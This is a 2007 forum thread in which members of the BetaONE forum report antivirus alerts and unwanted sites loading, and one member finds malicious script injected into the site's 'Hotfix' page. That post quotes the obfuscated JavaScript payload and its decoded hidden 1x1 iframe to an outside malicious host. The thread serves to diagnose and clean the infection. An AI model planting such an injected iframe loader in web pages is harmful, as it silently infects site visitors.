BetaONE will rise again!


Reply
  #11  
Old 3rd Nov 07, 10:38 PM
DoG's Avatar
DoG DoG is offline
Administrator
 
Join Date: Nov 2001
Posts: 2,996
DoG will become famous soon enoughDoG will become famous soon enough
Send a message via ICQ to DoG Send a message via MSN to DoG Send a message via Yahoo to DoG
I'm seeing this problem now on Firefox- will scan the server and see what's happening.
__________________

Reply With Quote
  #12  
Old 6th Nov 07, 01:49 PM
Voodoo's Avatar
Voodoo Voodoo is offline
Super Duper Moderator
 
Join Date: Nov 2001
Posts: 809
Voodoo is an unknown quantity at this point
Send a message via MSN to Voodoo
I am now also getting this from Nod32. I also notice a few other websites loading when I go to BetaOne.



Cheerz
Voodoo
__________________


Reply With Quote
  #13  
Old 8th Nov 07, 05:44 PM
Voodoo's Avatar
Voodoo Voodoo is offline
Super Duper Moderator
 
Join Date: Nov 2001
Posts: 809
Voodoo is an unknown quantity at this point
Send a message via MSN to Voodoo
BUMP

Can an admin look at this. As stated, a shitload of other sites are also loaded when you come here. Cant be good.

Cheerz
Dave
__________________


Reply With Quote
  #14  
Old 8th Nov 07, 10:29 PM
DoG's Avatar
DoG DoG is offline
Administrator
 
Join Date: Nov 2001
Posts: 2,996
DoG will become famous soon enoughDoG will become famous soon enough
Send a message via ICQ to DoG Send a message via MSN to DoG Send a message via Yahoo to DoG
The server was scanned and cleaned earlier this week- afaik it's still clean but will check. Are you sure you havent been infected with spyware?
__________________

Reply With Quote
  #15  
Old 9th Nov 07, 07:54 AM
freezer121 freezer121 is offline
BetaONE Supporter
 
Join Date: Oct 2001
Location: UK
Posts: 239
freezer121 is on a distinguished road
I've just got precisely the same as Voodoo from my NOD32. I think I'm clean but I'll check. I had no indications of a problem before today and was following the thread out of interest only - then Bingo!
Reply With Quote
  #16  
Old 9th Nov 07, 01:08 PM
Alpine's Avatar
Alpine Alpine is offline
Retired Crew
 
Join Date: Feb 2002
Location: Run Forest, RUN!!
Posts: 3,601
Alpine is on a distinguished road
Send a message via ICQ to Alpine Send a message via AIM to Alpine
i am clean on the 2 pcs i use to come over b1 ! Both are still giving me this virus !!

ill do another check on my pc right now !
Reply With Quote
  #17  
Old 9th Nov 07, 10:16 PM
DoG's Avatar
DoG DoG is offline
Administrator
 
Join Date: Nov 2001
Posts: 2,996
DoG will become famous soon enoughDoG will become famous soon enough
Send a message via ICQ to DoG Send a message via MSN to DoG Send a message via Yahoo to DoG
I scanned the server last night with KAV and Trend House Call but all was clean......
__________________

Reply With Quote
  #18  
Old 11th Nov 07, 08:47 PM
Cactus's Avatar
Cactus Cactus is offline
BetaONE Supporter
 
Join Date: Jul 2001
Posts: 819
Cactus is an unknown quantity at this point
DoG,

Now don't tell me you really coudn't find this....

The first page when surfing to B1 is named "BetaONE Hotfix" and has the following HTML code:

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>BetaONE Hotfix</title> </head> <body><Script Language="Javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E'));</script> <meta http-equiv="refresh" content="0; url=http://www.betaone.net/forum" /> </body> </html>
The Javascript code (unescaped) is
Code:
<iframe src="http://mn96.dns.gendistr.info/qualitytest" width=1 height=1></iframe>'
That page (after some more site switching) eventualy leaves you infected with what Symantec call's Trojan.Exploit.131 (see http://securityresponse.symantec.com...033008-3019-99) after witch it loads the betaone.net/forum page as if all is well.

So sure, the server might not be infected, but the index.php contains code that will get you infected. Now don't tell me you didn't see this, i mean, come on

Oh, and I saw today is yout birthday. Congratulations! Have a beer on me!

Anyways,
Cheers,

Le Cactus
__________________
Quote:
Several security vulnerabilities in Firefox and the Mozilla Suite of Internet software put users of the open-source products at risk of hacker attacks, the Mozilla Foundation is warning.
Reply With Quote
  #19  
Old 12th Nov 07, 06:14 PM
DoG's Avatar
DoG DoG is offline
Administrator
 
Join Date: Nov 2001
Posts: 2,996
DoG will become famous soon enoughDoG will become famous soon enough
Send a message via ICQ to DoG Send a message via MSN to DoG Send a message via Yahoo to DoG
I removed the erroneus script when i realised that it never used to be part of the hotfix page- then i saw your post and felt much happier
Hows's it going Cactus? Thanks for the Birthday wishes
__________________

Reply With Quote
  #20  
Old 12th Nov 07, 07:38 PM
Voodoo's Avatar
Voodoo Voodoo is offline
Super Duper Moderator
 
Join Date: Nov 2001
Posts: 809
Voodoo is an unknown quantity at this point
Send a message via MSN to Voodoo
Quote:
Originally Posted by DoG View Post
I removed the erroneus script when i realised that it never used to be part of the hotfix page-
Hi there Mike. All the other sites are still loading on my side? Tried Firefox as well as Opera.

Cheerz
Dave
__________________


Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Infected job search sites lead to info theft for 46,000 NewsBot NeoWin News 0 19th Aug 07 07:18 PM
Hundreds Click on 'Click Here to Get Infected' Ad NewsBot DriverHeaven News 0 20th May 07 05:36 PM
Don't get infected on Valentine's Day Alpine BetaONE News 0 14th Feb 07 10:21 PM
HP Mistakenly Distributes Drivers Infected with Virus NewsBot NeoWin News 0 2nd Jun 06 08:30 PM
Infected email from betaone? Dave Chit Chat 8 17th Feb 06 05:58 AM


All times are GMT +1. The time now is 05:19 PM.


Design by Vjacheslav Trushkin for phpBBStyles.com.
Powered by vBulletin® Version 3.6.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.